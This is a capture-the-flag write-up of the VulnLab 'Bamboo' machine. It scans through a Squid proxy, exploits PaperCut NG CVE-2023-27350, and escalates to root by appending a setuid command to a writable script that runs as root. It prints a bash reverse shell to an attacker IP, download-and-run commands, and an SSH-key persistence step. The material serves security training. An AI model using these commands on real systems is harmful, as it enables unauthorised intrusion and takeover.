POSTS

VULNLAB: Bamboo

Bamboo is an medium-rated Linux machine that begins with discovering a Squid proxy. The proxy is used to scan internal ports and reveals a PaperCut NG instance. A known PaperCut vulnerability CVE-2023-27350 is exploited to gain a foothold. Local enumeration reveals a writable directory containing a script that runs with root privileges. By modifying the script, we obtain a shell as root.

VULNLAB: Bamboo
2279 words · 11 min

Overview

  • Type Machines
  • OS Linux
  • Severity Medium
  • Creator xct
  • Release date 2023 Jun 10

Enumeration

Start the instance via Discord and let’s go:

image

10.10.107.35

Nmap

$ nmap -sC -sV -Pn -p- --min-rate=1000 -T4 10.10.107.35
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-15 21:22 JST
Nmap scan report for 10.10.92.62
Host is up (0.26s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 83:b2:62:7d:9c:9c:1d:1c:43:8c:e3:e3:6a:49:f0:a7 (ECDSA)
|_  256 cf:48:f5:f0:a6:c1:f5:cb:f8:65:18:95:43:b4:e7:e4 (ED25519)
3128/tcp open  http-proxy Squid http proxy 5.2
|_http-server-header: squid/5.2
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Found that a proxy Squid is open

Squid (3128/tcp)

We add it to our proxychains config file:

$ cat /etc/proxychains4.conf                                                       

# proxychains.conf  VER 4.x
#
#        HTTP, SOCKS4a, SOCKS5 tunneling proxifier with DNS.


# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
...
[ProxyList]
http	10.10.107.35 3128

That should be help us to maybe be able to look in the internal network.

Let’s go to scan.

We have several way to do it (we don’t use nmap as often it is not accurate over a squid proxy).

  1. Using spose:
$ git clone https://github.com/aancw/spose.git
$ cd spose
$ python3 spose.py --proxy http://10.10.107.35:3128 --target 10.10.107.35 --allports  
Scanning all 65,535 TCP ports
Using proxy address http://10.10.107.35:3128
10.10.107.35:22 seems OPEN
10.10.107.35:9191 seems OPEN
10.10.107.35:9192 seems OPEN
10.10.107.35:9195 seems OPEN
  1. Using xct’s squidscan:

Tune the configuration:

$ cat squidscan.go          

...
var (
	proxyURL = "http://10.10.107.35:3128" // adjust proxy ip & port 
	numWorkers = 100  // adjust workers
	numPorts = 65535 // adjust ports
)
...

Install the dependencies:

$ go mod tidy                                                                                                                           
go: downloading github.com/cheggaaa/pb/v3 v3.1.2
go: downloading github.com/VividCortex/ewma v1.2.0
go: downloading github.com/fatih/color v1.14.1
go: downloading github.com/mattn/go-colorable v0.1.13
go: downloading github.com/mattn/go-isatty v0.0.17
go: downloading github.com/mattn/go-runewidth v0.0.12
go: downloading golang.org/x/sys v0.5.0
go: downloading github.com/rivo/uniseg v0.2.0

Build it:

$ go build 

Let’s go to scan:

$ ./squidscan 
0 / 65535 [______________________________________________________________________________________________________________________] 0.00% ? p/s
Port 22 found!
9038 / 65535 [--------------->________________________________________________________________________________________________] 13.79% 408 p/s
Port 9173 found!
Port 9174 found!
9118 / 65535 [--------------->________________________________________________________________________________________________] 13.91% 408 p/s
Port 9192 found!
Port 9195 found!
9200 / 65535 [--------------->________________________________________________________________________________________________] 14.04% 408 p/s
Port 9191 found!
65533 / 65535 [--------------------------------------------------------------------------------------------------------------->] 100.00% 0 p/s

Interesting, squidscan found 2 more ports than spose: 9173 and 9174

We found more open ports.

We use curl to quickly check if we can grab some banner or interesting stuff to find what can be the next step:

$ curl --proxy http://10.10.107.35:3128 http://10.10.107.35:9191 -vv
19:08:12.731305 [0-0] * [SETUP] added
19:08:12.731373 [0-0] *   Trying 10.10.107.35:3128...
19:08:12.968087 [0-0] * Connected to 10.10.107.35 (10.10.107.35) port 3128
19:08:12.968147 [0-0] * using HTTP/1.x
19:08:12.968265 [0-0] > GET http://10.10.107.35:9191/ HTTP/1.1
19:08:12.968265 [0-0] > Host: 10.10.107.35:9191
19:08:12.968265 [0-0] > User-Agent: curl/8.11.1
19:08:12.968265 [0-0] > Accept: */*
19:08:12.968265 [0-0] > Proxy-Connection: Keep-Alive
19:08:12.968265 [0-0] > 
19:08:12.968580 [0-0] * Request completely sent off
19:08:13.207420 [0-0] < HTTP/1.1 302 Found
19:08:13.207525 [0-0] < Date: Thu, 16 Jan 2025 10:08:13 GMT
19:08:13.207580 [0-0] < Location: http://10.10.107.35:9191/user
19:08:13.207626 [0-0] < Content-Length: 0
19:08:13.207672 [0-0] < X-Cache: MISS from bamboo
19:08:13.207738 [0-0] < X-Cache-Lookup: MISS from bamboo:3128
19:08:13.207768 [0-0] < Via: 1.1 bamboo (squid/5.2)
19:08:13.207828 [0-0] < Connection: keep-alive
19:08:13.207859 [0-0] < 
19:08:13.207924 [0-0] * Connection #0 to host 10.10.107.35 left intact

Found a path Location: http://10.10.107.35:9191/user

Other ports are not currently so interesting.

We set our Foxyproxy extension in Firefox with the Squid proxy then access to this URL:

image

Found PaperCut NG 22.0

CVE-2023-27350 - PaperCut NG authentication bypassing (papercut) (Bamboo_User)

Searching for papercut exploits with google, we found some good stuff:

Create our bash reverse shell:

$ cat rev.sh                
#!/bin/bash
/bin/sh -i >& /dev/tcp/10.8.4.253/443 0>&1

Set a Netcat listener:

$ rlwrap -cAr nc -lvnp 443
listening on [any] 443 ...

Set a local web server:

$ python3 -m http.server 80                                            
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Then let’s exploit it:

$ git clone https://github.com/horizon3ai/CVE-2023-27350.git
$ cd CVE-2023-27350 
$ proxychains4 -q python CVE-2023-27350.py --url http://10.10.107.35:9191 --command "curl 10.8.4.253/rev.sh -o /tmp/rev.sh"
$ proxychains4 -q python CVE-2023-27350.py --url http://10.10.107.35:9191 --command "bash /tmp/rev.sh"

We got a shell as papercut:

$ rlwrap -cAr nc -lvnp 443
listening on [any] 443 ...
connect to [10.8.4.253] from (UNKNOWN) [10.10.107.35] 37616
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(papercut) gid=1001(papercut) groups=1001(papercut)

Then grab the flag Bamboo_User:

$ cd ~
$ ls
LICENCE.TXT
README-LINUX.TXT
THIRDPARTYLICENSEREADME.TXT
client
docs
providers
release
runtime
server
uninstall
user.txt
$ cat user.txt
VL{fbfa999a45a34576b799dac282bbccc3}

Privilege escalation

We can stabilize our shell but we prefer to have our full SSH access.

Add our public ssh key to authorized_keys :

$ pwd
/home/papercut
$ mkdir .ssh
$ cd .ssh
$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPiMSnZJVJH5ZkT5HXQTk4AmAuRNR4HANoZHX7YUcAaB user@tachikoma' > authorized_keys

Then we can access via SSH:

$ ssh -i ~/.ssh/id_ed25519 papercut@10.10.107.35                                                            
The authenticity of host '10.10.107.35 (10.10.107.35)' can't be established.
ED25519 key fingerprint is SHA256:wekk48npWyS2NE8vmnCU9mj9hhAW0AvPCy+R0C4Iz48.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.107.35' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.19.0-1025-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jan 16 10:41:44 UTC 2025

  System load:  0.0               Processes:             110
  Usage of /:   39.9% of 7.57GB   Users logged in:       0
  Memory usage: 51%               IPv4 address for ens5: 10.10.107.35
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

19 updates can be applied immediately.
13 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

papercut@bamboo:~$ 

In our home folder, we found a system folder and an interesting file server.properties:

papercut@bamboo:~$ ls -la
total 332
drwxr-xr-x 10 papercut papercut   4096 Jan 16 10:41 .
drwxr-xr-x  4 root     root       4096 May 26  2023 ..
lrwxrwxrwx  1 papercut papercut      9 May 26  2023 .bash_history -> /dev/null
-rw-r--r--  1 papercut papercut    220 May 26  2023 .bash_logout
-rw-rw-r--  1 papercut papercut     74 May 26  2023 .bash_profile
-rw-r--r--  1 papercut papercut   3771 May 26  2023 .bashrc
drwx------  2 papercut papercut   4096 Jan 16 10:41 .cache
-rw-r--r--  1 papercut papercut    102 Sep 29  2022 .install-config
drwxrwxr-x  3 papercut papercut   4096 May 26  2023 .local
-rw-r--r--  1 papercut papercut    881 May 26  2023 .profile
drwxr-xr-x  2 papercut papercut   4096 Jan 16 10:39 .ssh
-rwxr-xr-x  1 papercut papercut  50569 Sep 29  2022 LICENCE.TXT
-rwxr-xr-x  1 papercut papercut   1537 Sep 29  2022 README-LINUX.TXT
-rwxr-xr-x  1 papercut papercut 212715 Sep 29  2022 THIRDPARTYLICENSEREADME.TXT
drwxr-xr-x  5 papercut papercut   4096 May 26  2023 client
lrwxrwxrwx  1 papercut papercut     24 May 26  2023 docs -> server/data/content/help
drwxr-xr-x  9 papercut papercut   4096 May 26  2023 providers
drwxr-xr-x  6 papercut papercut   4096 May 26  2023 release
drwxr-xr-x  5 papercut papercut   4096 May 26  2023 runtime
drwxr-xr-x 13 papercut papercut   4096 May 26  2023 server
-rwxr-xr-x  1 papercut papercut   3099 Sep 29  2022 uninstall
-rw-rw-r--  1 papercut papercut     37 May 26  2023 user.txt
papercut@bamboo:~$ cd server
papercut@bamboo:~/server$ ls
bin	data	    event-store  lib	  logs	   server.properties	       server.uuid  version.txt
custom	deployment  examples	 lib-ext  reports  server.properties.template  tmp

papercut@bamboo:~/server$ cat server.properties
######### Server Config Properties #########

#
# IMPORTANT:  Do not change the permissions set on this file.  For security
# reasons, this file should only be accessible by administrators.
#


### Built-in Admin User ###
admin.username=admin
### Admin Password ###
# This may be manually set to a plain text password.
# If set by the application it will be prefixed with HASH:
admin.password=HASH\:$2a$10$I9n7kuIU2a0ODXhCfc3Z4e0h4G69KaFgDdksemRoNGrQf2Hu.4Xvm
...

Unfortunatelly not crackable

Using linPEAS, we can see that some services are calling executables which we can edit and located in our home folder:

...
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/grub-common.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/multi-user.target.wants/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/multi-user.target.wants/pc-print-deploy.service is calling this writable executable: /home/papercut/providers/print-deploy/linux-x64/pc-print-deploy
/etc/systemd/system/multi-user.target.wants/pc-web-print.service is calling this writable executable: /home/papercut/providers/web-print/linux-x64/pc-web-print
/etc/systemd/system/multi-user.target.wants/systemd-networkd.service could be executing some relative path
/etc/systemd/system/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/pc-print-deploy.service is calling this writable executable: /home/papercut/providers/print-deploy/linux-x64/pc-print-deploy
/etc/systemd/system/pc-web-print.service is calling this writable executable: /home/papercut/providers/web-print/linux-x64/pc-web-print
/etc/systemd/system/sleep.target.wants/grub-common.service could be executing some relative path
...

/etc/systemd/system/pc-print-deploy.service is calling this writable executable: /home/papercut/providers/print-deploy/linux-x64/pc-print-deploy is intersting because not impersonating the papercut user, so it runs as root.

Quick listing in /home/papercut/server/bin/linux-x64/:

papercut@bamboo:~/server$ ls -la bin/linux-x64/
total 13128
drwxr-xr-x 3 papercut papercut     4096 May 26  2023 .
drwx------ 3 papercut papercut     4096 Sep 29  2022 ..
-rw-r--r-- 1 papercut papercut     1522 Sep 29  2022 .common
-rwxr-xr-x 1 papercut papercut   111027 Sep 29  2022 app-monitor
-rw-r--r-- 1 papercut papercut     5514 Sep 29  2022 app-monitor.conf
-rwxr-xr-x 1 papercut papercut    16658 Sep 29  2022 app-server
-r-s--x--x 1 root     root        11071 Sep 29  2022 authpam
-rwxr-xr-x 1 papercut papercut     2456 Sep 29  2022 authsamba
-rwxr-xr-x 1 papercut papercut      479 Sep 29  2022 create-client-config-file
-rwxr-xr-x 1 papercut papercut      468 Sep 29  2022 create-ssl-keystore
-rwxr-xr-x 1 papercut papercut      763 Sep 29  2022 db-tools
-rwxr-xr-x 1 papercut papercut      501 Sep 29  2022 direct-print-monitor-config-initializer
-rwxr-xr-x 1 papercut papercut     2306 Sep 29  2022 gather-ldap-settings
drwxr-xr-x 2 papercut papercut     4096 May 26  2023 lib
-rwxr-xr-x 1 papercut papercut   493309 Sep 29  2022 pc-pdl-to-image
-rwxr-xr-x 1 papercut papercut 12689408 Sep 29  2022 pc-split-scan
-rwxr-xr-x 1 papercut papercut     9558 Sep 29  2022 pc-udp-redirect
-rwxr-xr-x 1 papercut papercut     7561 Sep 29  2022 roottasks
-rwxr-xr-x 1 papercut papercut     7777 Sep 29  2022 sambauserdir
-rwxr-xr-x 1 papercut papercut      493 Sep 29  2022 server-command
-rwxr-xr-x 1 papercut papercut     2253 Sep 29  2022 setperms
-rwxr-xr-x 1 papercut papercut      286 Sep 29  2022 start-server
-rwxr-xr-x 1 papercut papercut    11108 Sep 29  2022 stduserdir
-rwxr-xr-x 1 papercut papercut      279 Sep 29  2022 stop-server
-rwxr-xr-x 1 papercut papercut      480 Sep 29  2022 upgrade-server-configuration

All of these files are related to PaperCut NG (running on port 9191) so let’s forward that port via SSH and start enumeration:

ssh -i ~/.ssh/id_ed25519 papercut@10.10.107.35 -L 9191:127.0.0.1:9191 -N

Double check:

image

Ok so now we need credentials to login.

After checking with Google we can find Exploit-db.com - 51391 that exploit the CVE-2023-27350 that is the same we use previously for bypassing the authentication.

$ python3 51391.py                                                     
Enter the ip address: 127.0.0.1
Version: 22.0.6
Vulnerable version
Step 1 visit this url first in your browser: http://127.0.0.1:9191/app?service=page/SetupCompleted
Step 2 visit this url in your browser to bypass the login page : http://127.0.0.1:9191/app?service=page/Dashboard

After visiting the 2 URLs then we can access to the dashboard:

image

Now we are going to investigate the app and running pspy64 (uploaded in our target via local web server and curl) to check if some action will trigger a command as root.

Launch pspy64:

Then go to Enable Printing > Print Deploy (http://127.0.0.1:9191/app?service=page/PrintDeploy):

image

Then open that right panel clicking on < then in Print queue click on the (+) icon:

image

Click on Next:

image

Click on Start Importing Mobility Print printers:

image

Then we can see:

2025/01/16 11:25:57 CMD: UID=0     PID=1843   | v2023-02-14-1341/pc-print-deploy-server -dataDir=/home/papercut/providers/print-deploy/linux-x64//data -pclog.dev 
2025/01/16 11:25:57 CMD: UID=0     PID=1844   | 
2025/01/16 11:25:57 CMD: UID=0     PID=1845   | 
2025/01/16 11:25:57 CMD: UID=0     PID=1846   | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key 
2025/01/16 11:25:57 CMD: UID=0     PID=1847   | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key 
2025/01/16 11:25:57 CMD: UID=0     PID=1853   | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key 
2025/01/16 11:25:57 CMD: UID=0     PID=1852   | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key 
2025/01/16 11:25:57 CMD: UID=0     PID=1851   | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key 
2025/01/16 11:25:57 CMD: UID=0     PID=1854   | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key 
2025/01/16 11:25:59 CMD: UID=0     PID=1873   | /usr/bin/python3 -Es /usr/bin/lsb_release -sd

Then when click on Refresh servers:

image

We can also see:

2025/01/16 11:26:27 CMD: UID=0     PID=1883   | bash -c "/home/papercut/server/bin/linux-x64/server-command" get-config health.api.key 
2025/01/16 11:26:27 CMD: UID=0     PID=1884   | dirname /home/papercut/server/bin/linux-x64/server-command 
2025/01/16 11:26:27 CMD: UID=0     PID=1885   | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key 
2025/01/16 11:26:27 CMD: UID=0     PID=1886   | dirname /home/papercut/server/bin/linux-x64/server-command 
2025/01/16 11:26:27 CMD: UID=0     PID=1887   | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key 
2025/01/16 11:26:27 CMD: UID=???   PID=1888   | ???
2025/01/16 11:26:27 CMD: UID=0     PID=1893   | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key 
2025/01/16 11:26:27 CMD: UID=0     PID=1892   | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key 
2025/01/16 11:26:27 CMD: UID=0     PID=1891   | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key 
2025/01/16 11:26:27 CMD: UID=0     PID=1894   | /home/papercut/runtime/linux-x64/jre/bin/java -Djava.io.tmpdir=/home/papercut/server/tmp -Dserver.home=/home/papercut/server -Djava.awt.headless=true -Djava.locale.providers=COMPAT,SPI -Dlog4j.configurationFile=file:/home/papercut/server/lib/log4j2-command.properties -Xverify:none biz.papercut.pcng.server.ServerCommand get-config health.api.key 
2025/01/16 11:26:29 CMD: UID=0     PID=1914   | /usr/bin/python3 -Es /usr/bin/lsb_release -sd

As you can see, there is a bash script named server-command that got executed as root (UID=0).

So maybe we can write a reverse shell payload or any other command inside it.

First, let’s confirm if it’s writable:

papercut@bamboo:~/server/bin/linux-x64$ find . -writable
.
./pc-pdl-to-image
./authsamba
./pc-udp-redirect
./start-server
./create-ssl-keystore
./server-command
./app-server
./lib
./lib/libwrapper.so
./lib/wrapper-3.2.3.jar
./gather-ldap-settings
./create-client-config-file
./direct-print-monitor-config-initializer
./db-tools
./upgrade-server-configuration
./app-monitor.conf
./stduserdir
./.common
./pc-split-scan
./setperms
./sambauserdir
./roottasks
./stop-server
./app-monitor

confirmed, we have write access to server-command

Let’s exploit it with the easy way to add a simple command that will give bash the setuid bit:

papercut@bamboo:~/server/bin/linux-x64$ echo 'chmod u+s /bin/bash' >> server-command

Then we trigger the script by clicking the Refresh servers button and check is the bash has changed and if we can see it has the setuid bit set:

papercut@bamboo:~/server/bin/linux-x64$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash

Pwned

Now let’s escalate to root and grab the flag Bamboo_Root:

papercut@bamboo:~/server/bin/linux-x64$ bash -p
bash-5.1# id
uid=1001(papercut) gid=1001(papercut) euid=0(root) groups=1001(papercut)
bash-5.1# cat /root/root.txt 
VL{4805dfe631e59ad76c1706b767699126}

Extra

Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=ebbb582f-617d-4dbb-9771-8c3c36e2b8d1

FxNRX5oXgAAlEMN